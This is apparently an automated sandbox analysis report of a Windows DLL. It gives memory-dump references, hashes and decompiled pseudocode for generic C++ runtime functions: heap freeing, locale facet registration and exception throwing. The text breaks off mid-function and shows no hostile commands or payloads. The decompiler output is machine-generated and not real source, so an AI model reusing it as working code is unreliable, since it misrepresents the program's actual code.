_free.LIBCMT ref: 6E20D403

Part of subcall function 6E20CBD3: HeapFree.KERNEL32(00000000,00000000,?,6E21CFAF,00000000,00000000,00000000,00000000,?,6E21D2B4,00000000,00000007,00000000,?,6E21C0FC,00000000), ref: 6E20CBE9
Part of subcall function 6E20CBD3: GetLastError.KERNEL32(00000000,?,6E21CFAF,00000000,00000000,00000000,00000000,?,6E21D2B4,00000000,00000007,00000000,?,6E21C0FC,00000000,00000000), ref: 6E20CBFB

_free.LIBCMT ref: 6E20D40F
_free.LIBCMT ref: 6E20D41A
_free.LIBCMT ref: 6E20D425
_free.LIBCMT ref: 6E20D430
_free.LIBCMT ref: 6E20D43B
_free.LIBCMT ref: 6E20D446
_free.LIBCMT ref: 6E20D451
_free.LIBCMT ref: 6E20D45C
_free.LIBCMT ref: 6E20D46A

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: c29ffdec72d6794a1666693f3202838039e9982cbb23024250e878eec34f0652
Instruction ID: 02c24aa89059d7b7a161fff395e392460e3a6384a0d5c1cc111f86832b4b651c
Opcode Fuzzy Hash: c29ffdec72d6794a1666693f3202838039e9982cbb23024250e878eec34f0652
Instruction Fuzzy Hash: 9611FBB954400CBFCB01DF94C841DDE3BBAEF04654B2144A0F9094F1B2EB75DE509B91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1C777F, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6E1C777F(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a8) {
				intOrPtr _v0;
				signed int _v4;
				void* _v16;
				char _v20;
				char _v32;
				void* _t19;
				intOrPtr* _t20;
				intOrPtr* _t42;
				void* _t50;

				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653( &_v20, 0);
				_t50 =  *0x6e286c10; // 0x0
				_v4 = _v4 & 0x00000000;
				_v16 = _t50;
				_t19 = E6E1A161C(0x6e286b2c);
				_t38 = _a8;
				_t20 = E6E1A171B(_a8, _t19);
				_t48 = _t20;
				if(_t20 != 0) {
					L5:
					E6E1C66BA( &_v20);
					return E6E1E0075(_t48);
				} else {
					if(_t50 == 0) {
						_push(_a8);
						_push( &_v16);
						__eflags = E6E1C7E4C(__ebx, _t38, __edx, _t48, _t50) - 0xffffffff;
						if(__eflags == 0) {
							_t42 =  &_v32;
							E6E1A1438(_t42);
							E6E1E3D74( &_v32, 0x6e283504);
							asm("int3");
							 *_t42 = _v0;
							return _t42;
						} else {
							_t48 = _v16;
							_v16 = _t48;
							_v4 = 1;
							E6E1C6FD3(__eflags, _t48);
							 *0x6e22a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t48 + 4))))();
							 *0x6e286c10 = _t48;
							goto L5;
						}
					} else {
						_t48 = _t50;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6E1C7786
std::_Lockit::_Lockit.LIBCPMT ref: 6E1C7790
int.LIBCPMT ref: 6E1C77A7

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

codecvt.LIBCPMT ref: 6E1C77CA
std::_Facet_Register.LIBCPMT ref: 6E1C77E1
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1C7801
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1C781F

Strings

,k(n, xrefs: 6E1C779B

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcodecvt
String ID: ,k(n
API String ID: 2594415655-2020936110
Opcode ID: 3186ef75f333638b03b08893d7f19d632a916ec1fa1cfa8e8539339f0b5478f9
Instruction ID: fe987b9a326b85dc330a66738f4135c667c0313f0e37f567eaa3ba5c8c05ae5f
Opcode Fuzzy Hash: 3186ef75f333638b03b08893d7f19d632a916ec1fa1cfa8e8539339f0b5478f9
Instruction Fuzzy Hash: FF11E97591061D9BCB01EBE4C844AFEB77ABF64B14F140809E510E7290DFB89D85D792

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CEEEB, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6E1CEEEB(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t321;
				signed int _t322;
				void* _t334;
				void* _t347;
				void* _t360;
				void* _t373;
				void* _t386;
				void* _t399;
				void* _t412;
				void* _t425;
				void* _t438;
				void* _t451;
				void* _t464;
				void* _t477;
				void* _t490;
				void* _t503;
				void* _t516;
				void* _t529;
				void* _t542;
				void* _t555;
				void* _t568;
				void* _t581;
				void* _t594;
				signed int _t853;
				signed int _t923;
				signed int _t924;
				signed int _t925;
				signed int _t926;
				signed int _t927;
				signed int _t928;
				signed int _t929;
				signed int _t930;
				signed int _t931;
				signed int _t932;
				signed int _t933;
				signed int _t934;
				signed int _t935;
				signed int _t936;
				signed int _t937;
				signed int _t938;
				signed int _t939;
				signed int _t940;
				signed int _t941;
				signed int _t942;
				signed int _t943;
				signed int _t945;
				signed int _t946;
				signed int _t947;
				signed int _t948;
				signed int _t949;
				signed int _t950;
				signed int _t951;
				signed int _t952;
				signed int _t953;
				signed int _t954;
				signed int _t955;
				signed int _t956;
				signed int _t957;
				signed int _t958;
				signed int _t959;
				signed int _t960;
				signed int _t961;
				signed int _t962;
				signed int _t963;
				signed int _t964;
				signed int _t965;
				signed int _t966;
				signed int _t967;
				void* _t990;

				_t920 = __edx;
				_t699 = __ebx;
				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653(_t990 - 0x14, 0);
				_t945 =  *0x6e286e04; // 0x0
				 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
				 *(_t990 - 0x10) = _t945;
				_t321 = E6E1A161C(0x6e286b30);
				_t702 =  *((intOrPtr*)(_t990 + 8));
				_t322 = E6E1A171B( *((intOrPtr*)(_t990 + 8)), _t321);
				_t922 = _t322;
				if(_t322 != 0) {
					L5:
					E6E1C66BA(_t990 - 0x14);
					return E6E1E0075(_t922);
				} else {
					if(_t945 == 0) {
						_push( *((intOrPtr*)(_t990 + 8)));
						_push(_t990 - 0x10);
						__eflags = E6E1D0C9D(__ebx, _t702, __edx, _t922, _t945) - 0xffffffff;
						if(__eflags == 0) {
							E6E1A1438(_t990 - 0x20);
							E6E1E3D74(_t990 - 0x20, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e2283cf, __ebx, _t922, _t945, 0x14);
							E6E1C6653(_t990 - 0x14, 0);
							_t946 =  *0x6e286de4; // 0x0
							 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
							 *(_t990 - 0x10) = _t946;
							_t334 = E6E1A161C(0x6e286d90);
							_t709 =  *((intOrPtr*)(_t990 + 8));
							_t923 = E6E1A171B( *((intOrPtr*)(_t990 + 8)), _t334);
							__eflags = _t923;
							if(_t923 != 0) {
								L12:
								E6E1C66BA(_t990 - 0x14);
								return E6E1E0075(_t923);
							} else {
								__eflags = _t946;
								if(_t946 == 0) {
									_push( *((intOrPtr*)(_t990 + 8)));
									_push(_t990 - 0x10);
									__eflags = E6E1D0D03(_t699, _t709, __edx, _t923, _t946) - 0xffffffff;
									if(__eflags == 0) {
										E6E1A1438(_t990 - 0x20);
										E6E1E3D74(_t990 - 0x20, 0x6e283504);
										asm("int3");
										E6E1E00AC(0x6e2283cf, _t699, _t923, _t946, 0x14);
										E6E1C6653(_t990 - 0x14, 0);
										_t947 =  *0x6e286db4; // 0x0
										 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
										 *(_t990 - 0x10) = _t947;
										_t347 = E6E1A161C(0x6e286d68);
										_t716 =  *((intOrPtr*)(_t990 + 8));
										_t924 = E6E1A171B( *((intOrPtr*)(_t990 + 8)), _t347);
										__eflags = _t924;
										if(_t924 != 0) {
											L19:
											E6E1C66BA(_t990 - 0x14);
											return E6E1E0075(_t924);
										} else {
											__eflags = _t947;
											if(_t947 == 0) {
												_push( *((intOrPtr*)(_t990 + 8)));
												_push(_t990 - 0x10);
												__eflags = E6E1D0DA5(_t699, _t716, __edx, _t924, _t947) - 0xffffffff;
												if(__eflags == 0) {
													E6E1A1438(_t990 - 0x20);
													E6E1E3D74(_t990 - 0x20, 0x6e283504);
													asm("int3");
													E6E1E00AC(0x6e2283cf, _t699, _t924, _t947, 0x14);
													E6E1C6653(_t990 - 0x14, 0);
													_t948 =  *0x6e286dd4; // 0x0
													 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
													 *(_t990 - 0x10) = _t948;
													_t360 = E6E1A161C(0x6e286b28);
													_t723 =  *((intOrPtr*)(_t990 + 8));
													_t925 = E6E1A171B( *((intOrPtr*)(_t990 + 8)), _t360);
													__eflags = _t925;
													if(_t925 != 0) {
														L26:
														E6E1C66BA(_t990 - 0x14);
														return E6E1E0075(_t925);
													} else {
														__eflags = _t948;
														if(_t948 == 0) {
															_push( *((intOrPtr*)(_t990 + 8)));
															_push(_t990 - 0x10);
															__eflags = E6E1D0E47(_t699, _t723, _t920, _t925, _t948) - 0xffffffff;
															if(__eflags == 0) {
																E6E1A1438(_t990 - 0x20);
																E6E1E3D74(_t990 - 0x20, 0x6e283504);
																asm("int3");
																E6E1E00AC(0x6e2283cf, _t699, _t925, _t948, 0x14);
																E6E1C6653(_t990 - 0x14, 0);
																_t949 =  *0x6e286de8; // 0x0
																 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																 *(_t990 - 0x10) = _t949;
																_t373 = E6E1A161C(0x6e286d94);
																_t730 =  *((intOrPtr*)(_t990 + 8));
																_t926 = E6E1A171B( *((intOrPtr*)(_t990 + 8)), _t373);
																__eflags = _t926;
																if(_t926 != 0) {
																	L33:
																	E6E1C66BA(_t990 - 0x14);
																	return E6E1E0075(_t926);
																} else {
																	__eflags = _t949;
																	if(_t949 == 0) {
																		_push( *((intOrPtr*)(_t990 + 8)));
																		_push(_t990 - 0x10);
																		__eflags = E6E1D0EB7(_t699, _t730, _t920, _t926, _t949) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1A1438(_t990 - 0x20);
																			E6E1E3D74(_t990 - 0x20, 0x6e283504);
																			asm("int3");
																			E6E1E00AC(0x6e2283cf, _t699, _t926, _t949, 0x14);
																			E6E1C6653(_t990 - 0x14, 0);
																			_t950 =  *0x6e286db8; // 0x0
																			 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																			 *(_t990 - 0x10) = _t950;
																			_t386 = E6E1A161C(0x6e286d6c);
																			_t737 =  *((intOrPtr*)(_t990 + 8));
																			_t927 = E6E1A171B( *((intOrPtr*)(_t990 + 8)), _t386);
																			__eflags = _t927;
																			if(_t927 != 0) {
																				L40:
																				E6E1C66BA(_t990 - 0x14);
																				return E6E1E0075(_t927);
																			} else {
																				__eflags = _t950;
																				if(_t950 == 0) {
																					_push( *((intOrPtr*)(_t990 + 8)));
																					_push(_t990 - 0x10);
																					__eflags = E6E1D0F1F(_t699, _t737, _t920, _t927, _t950) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1A1438(_t990 - 0x20);
																						E6E1E3D74(_t990 - 0x20, 0x6e283504);
																						asm("int3");
																						E6E1E00AC(0x6e2283cf, _t699, _t927, _t950, 0x14);
																						E6E1C6653(_t990 - 0x14, 0);
																						_t951 =  *0x6e286dec; // 0x0
																						 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																						 *(_t990 - 0x10) = _t951;
																						_t399 = E6E1A161C(0x6e286d98);
																						_t744 =  *((intOrPtr*)(_t990 + 8));
																						_t928 = E6E1A171B( *((intOrPtr*)(_t990 + 8)), _t399);
																						__eflags = _t928;
																						if(_t928 != 0) {
																							L47:
																							E6E1C66BA(_t990 - 0x14);
																							return E6E1E0075(_t928);
																						} else {
																							__eflags = _t951;
																							if(_t951 == 0) {
																								_push( *((intOrPtr*)(_t990 + 8)));
																								_push(_t990 - 0x10);
																								__eflags = E6E1D0F87(_t699, _t744, _t920, _t928, _t951) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1A1438(_t990 - 0x20);
																									E6E1E3D74(_t990 - 0x20, 0x6e283504);
																									asm("int3");
																									E6E1E00AC(0x6e2283cf, _t699, _t928, _t951, 0x14);
																									E6E1C6653(_t990 - 0x14, 0);
																									_t952 =  *0x6e286dbc; // 0x0
																									 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																									 *(_t990 - 0x10) = _t952;
																									_t412 = E6E1A161C(0x6e286d70);
																									_t751 =  *((intOrPtr*)(_t990 + 8));
																									_t929 = E6E1A171B( *((intOrPtr*)(_t990 + 8)), _t412);
																									__eflags = _t929;
																									if(_t929 != 0) {
																										L54:
																										E6E1C66BA(_t990 - 0x14);
																										return E6E1E0075(_t929);
																									} else {
																										__eflags = _t952;
																										if(_t952 == 0) {
																											_push( *((intOrPtr*)(_t990 + 8)));
																											_push(_t990 - 0x10);
																											__eflags = E6E1D0FEF(_t699, _t751, _t920, _t929, _t952) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E1A1438(_t990 - 0x20);
																												E6E1E3D74(_t990 - 0x20, 0x6e283504);
																												asm("int3");
																												E6E1E00AC(0x6e2283cf, _t699, _t929, _t952, 0x14);
																												E6E1C6653(_t990 - 0x14, 0);
																												_t953 =  *0x6e286df0; // 0x0
																												 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																												 *(_t990 - 0x10) = _t953;
																												_t425 = E6E1A161C(0x6e286d9c);
																												_t758 =  *((intOrPtr*)(_t990 + 8));
																												_t930 = E6E1A171B( *((intOrPtr*)(_t990 + 8)), _t425);
																												__eflags = _t930;
																												if(_t930 != 0) {
																													L61:
																													E6E1C66BA(_t990 - 0x14);
																													return E6E1E0075(_t930);
																												} else {
																													__eflags = _t953;
																													if(_t953 == 0) {
																														_push( *((intOrPtr*)(_t990 + 8)));
																														_push(_t990 - 0x10);
																														__eflags = E6E1D1057(_t699, _t758, _t920, _t930, _t953) - 0xffffffff;
																														if(__eflags == 0) {
																															E6E1A1438(_t990 - 0x20);
																															E6E1E3D74(_t990 - 0x20, 0x6e283504);
																															asm("int3");
																															E6E1E00AC(0x6e2283cf, _t699, _t930, _t953, 0x14);
																															E6E1C6653(_t990 - 0x14, 0);
																															_t954 =  *0x6e286dc0; // 0x0
																															 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																															 *(_t990 - 0x10) = _t954;
																															_t438 = E6E1A161C(0x6e286d74);
																															_t765 =  *((intOrPtr*)(_t990 + 8));
																															_t931 = E6E1A171B( *((intOrPtr*)(_t990 + 8)), _t438);
																															__eflags = _t931;
																															if(_t931 != 0) {
																																L68:
																																E6E1C66BA(_t990 - 0x14);
																																return E6E1E0075(_t931);
																															} else {
																																__eflags = _t954;
																																if(_t954 == 0) {
																																	_push( *((intOrPtr*)(_t990 + 8)));
																																	_push(_t990 - 0x10);
																																	__eflags = E6E1D10BF(_t699, _t765, _t920, _t931, _t954) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6E1A1438(_t990 - 0x20);
																																		E6E1E3D74(_t990 - 0x20, 0x6e283504);
																																		asm("int3");
																																		E6E1E00AC(0x6e2283cf, _t699, _t931, _t954, 0x14);
																																		E6E1C6653(_t990 - 0x14, 0);
																																		_t955 =  *0x6e286df8; // 0x0
																																		 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																		 *(_t990 - 0x10) = _t955;
																																		_t451 = E6E1A161C(0x6e286da4);
																																		_t772 =  *((intOrPtr*)(_t990 + 8));
																																		_t932 = E6E1A171B( *((intOrPtr*)(_t990 + 8)), _t451);
																																		__eflags = _t932;
																																		if(_t932 != 0) {
																																			L75:
																																			E6E1C66BA(_t990 - 0x14);
																																			return E6E1E0075(_t932);
																																		} else {
																																			__eflags = _t955;
																																			if(_t955 == 0) {
																																				_push( *((intOrPtr*)(_t990 + 8)));
																																				_push(_t990 - 0x10);
																																				__eflags = E6E1D1127(_t699, _t772, _t920, _t932, _t955) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6E1A1438(_t990 - 0x20);
																																					E6E1E3D74(_t990 - 0x20, 0x6e283504);
																																					asm("int3");
																																					E6E1E00AC(0x6e2283cf, _t699, _t932, _t955, 0x14);
																																					E6E1C6653(_t990 - 0x14, 0);
																																					_t956 =  *0x6e286df4; // 0x0
																																					 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																					 *(_t990 - 0x10) = _t956;
																																					_t464 = E6E1A161C(0x6e286da0);
																																					_t779 =  *((intOrPtr*)(_t990 + 8));
																																					_t933 = E6E1A171B( *((intOrPtr*)(_t990 + 8)), _t464);
																																					__eflags = _t933;
																																					if(_t933 != 0) {
																																						L82:
																																						E6E1C66BA(_t990 - 0x14);
																																						return E6E1E0075(_t933);
																																					} else {
																																						__eflags = _t956;
																																						if(_t956 == 0) {
																																							_push( *((intOrPtr*)(_t990 + 8)));
																																							_push(_t990 - 0x10);
																																							__eflags = E6E1D11AB(_t699, _t779, _t920, _t933, _t956) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6E1A1438(_t990 - 0x20);
																																								E6E1E3D74(_t990 - 0x20, 0x6e283504);
																																								asm("int3");
																																								E6E1E00AC(0x6e2283cf, _t699, _t933, _t956, 0x14);
																																								E6E1C6653(_t990 - 0x14, 0);
																																								_t957 =  *0x6e286dc8; // 0x0
																																								 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																								 *(_t990 - 0x10) = _t957;
																																								_t477 = E6E1A161C(0x6e286d7c);
																																								_t786 =  *((intOrPtr*)(_t990 + 8));
																																								_t934 = E6E1A171B( *((intOrPtr*)(_t990 + 8)), _t477);
																																								__eflags = _t934;
																																								if(_t934 != 0) {
																																									L89:
																																									E6E1C66BA(_t990 - 0x14);
																																									return E6E1E0075(_t934);
																																								} else {
																																									__eflags = _t957;
																																									if(_t957 == 0) {
																																										_push( *((intOrPtr*)(_t990 + 8)));
																																										_push(_t990 - 0x10);
																																										__eflags = E6E1D1230(_t699, _t786, _t920, _t934, _t957) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E6E1A1438(_t990 - 0x20);
																																											E6E1E3D74(_t990 - 0x20, 0x6e283504);
																																											asm("int3");
																																											E6E1E00AC(0x6e2283cf, _t699, _t934, _t957, 0x14);
																																											E6E1C6653(_t990 - 0x14, 0);
																																											_t958 =  *0x6e286dc4; // 0x0
																																											 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																											 *(_t990 - 0x10) = _t958;
																																											_t490 = E6E1A161C(0x6e286d78);
																																											_t793 =  *((intOrPtr*)(_t990 + 8));
																																											_t935 = E6E1A171B( *((intOrPtr*)(_t990 + 8)), _t490);
																																											__eflags = _t935;
																																											if(_t935 != 0) {
																																												L96:
																																												E6E1C66BA(_t990 - 0x14);
																																												return E6E1E0075(_t935);
																																											} else {
																																												__eflags = _t958;
																																												if(_t958 == 0) {
																																													_push( *((intOrPtr*)(_t990 + 8)));
																																													_push(_t990 - 0x10);
																																													__eflags = E6E1D12B4(_t699, _t793, _t920, _t935, _t958) - 0xffffffff;
																																													if(__eflags == 0) {
																																														E6E1A1438(_t990 - 0x20);
																																														E6E1E3D74(_t990 - 0x20, 0x6e283504);
																																														asm("int3");
																																														E6E1E00AC(0x6e2283cf, _t699, _t935, _t958, 0x14);
																																														E6E1C6653(_t990 - 0x14, 0);
																																														_t959 =  *0x6e286dd8; // 0x0
																																														 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																														 *(_t990 - 0x10) = _t959;
																																														_t503 = E6E1A161C(0x6e286d84);
																																														_t800 =  *((intOrPtr*)(_t990 + 8));
																																														_t936 = E6E1A171B( *((intOrPtr*)(_t990 + 8)), _t503);
																																														__eflags = _t936;
																																														if(_t936 != 0) {
																																															L103:
																																															E6E1C66BA(_t990 - 0x14);
																																															return E6E1E0075(_t936);
																																														} else {
																																															__eflags = _t959;
																																															if(_t959 == 0) {
																																																_push( *((intOrPtr*)(_t990 + 8)));
																																																_push(_t990 - 0x10);
																																																__eflags = E6E1D1339(_t699, _t800, _t920, _t936, _t959) - 0xffffffff;
																																																if(__eflags == 0) {
																																																	E6E1A1438(_t990 - 0x20);
																																																	E6E1E3D74(_t990 - 0x20, 0x6e283504);
																																																	asm("int3");
																																																	E6E1E00AC(0x6e2283cf, _t699, _t936, _t959, 0x14);
																																																	E6E1C6653(_t990 - 0x14, 0);
																																																	_t960 =  *0x6e286db0; // 0x0
																																																	 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																																	 *(_t990 - 0x10) = _t960;
																																																	_t516 = E6E1A161C(0x6e286d64);
																																																	_t807 =  *((intOrPtr*)(_t990 + 8));
																																																	_t937 = E6E1A171B( *((intOrPtr*)(_t990 + 8)), _t516);
																																																	__eflags = _t937;
																																																	if(_t937 != 0) {
																																																		L110:
																																																		E6E1C66BA(_t990 - 0x14);
																																																		return E6E1E0075(_t937);
																																																	} else {
																																																		__eflags = _t960;
																																																		if(_t960 == 0) {
																																																			_push( *((intOrPtr*)(_t990 + 8)));
																																																			_push(_t990 - 0x10);
																																																			__eflags = E6E1D13A1(_t699, _t807, _t920, _t937, _t960) - 0xffffffff;
																																																			if(__eflags == 0) {
																																																				E6E1A1438(_t990 - 0x20);
																																																				E6E1E3D74(_t990 - 0x20, 0x6e283504);
																																																				asm("int3");
																																																				E6E1E00AC(0x6e2283cf, _t699, _t937, _t960, 0x14);
																																																				E6E1C6653(_t990 - 0x14, 0);
																																																				_t961 =  *0x6e286ddc; // 0x0
																																																				 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																																				 *(_t990 - 0x10) = _t961;
																																																				_t529 = E6E1A161C(0x6e286d88);
																																																				_t814 =  *((intOrPtr*)(_t990 + 8));
																																																				_t938 = E6E1A171B( *((intOrPtr*)(_t990 + 8)), _t529);
																																																				__eflags = _t938;
																																																				if(_t938 != 0) {
																																																					L117:
																																																					E6E1C66BA(_t990 - 0x14);
																																																					return E6E1E0075(_t938);
																																																				} else {
																																																					__eflags = _t961;
																																																					if(_t961 == 0) {
																																																						_push( *((intOrPtr*)(_t990 + 8)));
																																																						_push(_t990 - 0x10);
																																																						__eflags = E6E1D1409(_t699, _t814, _t920, _t938, _t961) - 0xffffffff;
																																																						if(__eflags == 0) {
																																																							E6E1A1438(_t990 - 0x20);
																																																							E6E1E3D74(_t990 - 0x20, 0x6e283504);
																																																							asm("int3");
																																																							E6E1E00AC(0x6e2283cf, _t699, _t938, _t961, 0x14);
																																																							E6E1C6653(_t990 - 0x14, 0);
																																																							_t962 =  *0x6e286de0; // 0x0
																																																							 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																																							 *(_t990 - 0x10) = _t962;
																																																							_t542 = E6E1A161C(0x6e286d8c);
																																																							_t821 =  *((intOrPtr*)(_t990 + 8));
																																																							_t939 = E6E1A171B( *((intOrPtr*)(_t990 + 8)), _t542);
																																																							__eflags = _t939;
																																																							if(_t939 != 0) {
																																																								L124:
																																																								E6E1C66BA(_t990 - 0x14);
																																																								return E6E1E0075(_t939);
																																																							} else {
																																																								__eflags = _t962;
																																																								if(_t962 == 0) {
																																																									_push( *((intOrPtr*)(_t990 + 8)));
																																																									_push(_t990 - 0x10);
																																																									__eflags = E6E1D1471(_t699, _t821, _t920, _t939, _t962) - 0xffffffff;
																																																									if(__eflags == 0) {
																																																										E6E1A1438(_t990 - 0x20);
																																																										E6E1E3D74(_t990 - 0x20, 0x6e283504);
																																																										asm("int3");
																																																										E6E1E00AC(0x6e2283cf, _t699, _t939, _t962, 0x14);
																																																										E6E1C6653(_t990 - 0x14, 0);
																																																										_t963 =  *0x6e286dfc; // 0x0
																																																										 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																																										 *(_t990 - 0x10) = _t963;
																																																										_t555 = E6E1A161C(0x6e286da8);
																																																										_t828 =  *((intOrPtr*)(_t990 + 8));
																																																										_t940 = E6E1A171B( *((intOrPtr*)(_t990 + 8)), _t555);
																																																										__eflags = _t940;
																																																										if(_t940 != 0) {
																																																											L131:
																																																											E6E1C66BA(_t990 - 0x14);
																																																											return E6E1E0075(_t940);
																																																										} else {
																																																											__eflags = _t963;
																																																											if(_t963 == 0) {
																																																												_push( *((intOrPtr*)(_t990 + 8)));
																																																												_push(_t990 - 0x10);
																																																												__eflags = E6E1D14EC(_t699, _t828, _t920, _t940, _t963) - 0xffffffff;
																																																												if(__eflags == 0) {
																																																													E6E1A1438(_t990 - 0x20);
																																																													E6E1E3D74(_t990 - 0x20, 0x6e283504);
																																																													asm("int3");
																																																													E6E1E00AC(0x6e2283cf, _t699, _t940, _t963, 0x14);
																																																													E6E1C6653(_t990 - 0x14, 0);
																																																													_t964 =  *0x6e286dcc; // 0x0
																																																													 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																																													 *(_t990 - 0x10) = _t964;
																																																													_t568 = E6E1A161C(0x6e286d80);
																																																													_t835 =  *((intOrPtr*)(_t990 + 8));
																																																													_t941 = E6E1A171B( *((intOrPtr*)(_t990 + 8)), _t568);
																																																													__eflags = _t941;
																																																													if(_t941 != 0) {
																																																														L138:
																																																														E6E1C66BA(_t990 - 0x14);
																																																														return E6E1E0075(_t941);
																																																													} else {
																																																														__eflags = _t964;
																																																														if(_t964 == 0) {
																																																															_push( *((intOrPtr*)(_t990 + 8)));
																																																															_push(_t990 - 0x10);
																																																															__eflags = E6E1D1558(_t699, _t835, _t920, _t941, _t964) - 0xffffffff;
																																																															if(__eflags == 0) {
																																																																E6E1A1438(_t990 - 0x20);
																																																																E6E1E3D74(_t990 - 0x20, 0x6e283504);
																																																																asm("int3");
																																																																E6E1E00AC(0x6e2283cf, _t699, _t941, _t964, 0x14);
																																																																E6E1C6653(_t990 - 0x14, 0);
																																																																_t965 =  *0x6e286e00; // 0x0
																																																																 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																																																 *(_t990 - 0x10) = _t965;
																																																																_t581 = E6E1A161C(0x6e286dac);
																																																																_t842 =  *((intOrPtr*)(_t990 + 8));
																																																																_t942 = E6E1A171B( *((intOrPtr*)(_t990 + 8)), _t581);
																																																																__eflags = _t942;
																																																																if(_t942 != 0) {
																																																																	L145:
																																																																	E6E1C66BA(_t990 - 0x14);
																																																																	return E6E1E0075(_t942);
																																																																} else {
																																																																	__eflags = _t965;
																																																																	if(_t965 == 0) {
																																																																		_push( *((intOrPtr*)(_t990 + 8)));
																																																																		_push(_t990 - 0x10);
																																																																		__eflags = E6E1D15C4(_t699, _t842, _t920, _t942, _t965) - 0xffffffff;
																																																																		if(__eflags == 0) {
																																																																			E6E1A1438(_t990 - 0x20);
																																																																			E6E1E3D74(_t990 - 0x20, 0x6e283504);
																																																																			asm("int3");
																																																																			E6E1E00AC(0x6e2283cf, _t699, _t942, _t965, 0x14);
																																																																			E6E1C6653(_t990 - 0x14, 0);
																																																																			_t966 =  *0x6e286dd0; // 0x0
																																																																			 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																																																			 *(_t990 - 0x10) = _t966;
																																																																			_t594 = E6E1A161C(0x6e286d60);
																																																																			_t849 =  *((intOrPtr*)(_t990 + 8));
																																																																			_t943 = E6E1A171B( *((intOrPtr*)(_t990 + 8)), _t594);
																																																																			__eflags = _t943;
																																																																			if(_t943 != 0) {
																																																																				L152:
																																																																				E6E1C66BA(_t990 - 0x14);
																																																																				return E6E1E0075(_t943);
																																																																			} else {
																																																																				__eflags = _t966;
																																																																				if(_t966 == 0) {
																																																																					_push( *((intOrPtr*)(_t990 + 8)));
																																																																					_push(_t990 - 0x10);
																																																																					__eflags = E6E1D162A(_t699, _t849, _t920, _t943, _t966) - 0xffffffff;
																																																																					if(__eflags == 0) {
																																																																						_t853 = _t990 - 0x20;
																																																																						E6E1A1438(_t853);
																																																																						E6E1E3D74(_t990 - 0x20, 0x6e283504);
																																																																						asm("int3");
																																																																						E6E1E00AC(0x6e22851f, _t699, _t943, _t966, 4);
																																																																						_t967 = _t853;
																																																																						 *(_t990 - 0x10) = _t967;
																																																																						 *((intOrPtr*)(_t967 + 4)) =  *((intOrPtr*)(_t990 + 0xc));
																																																																						_push( *((intOrPtr*)(_t990 + 0x14)));
																																																																						_t315 = _t990 - 4;
																																																																						 *_t315 =  *(_t990 - 4) & 0x00000000;
																																																																						__eflags =  *_t315;
																																																																						 *_t967 = 0x6e22c0c4;
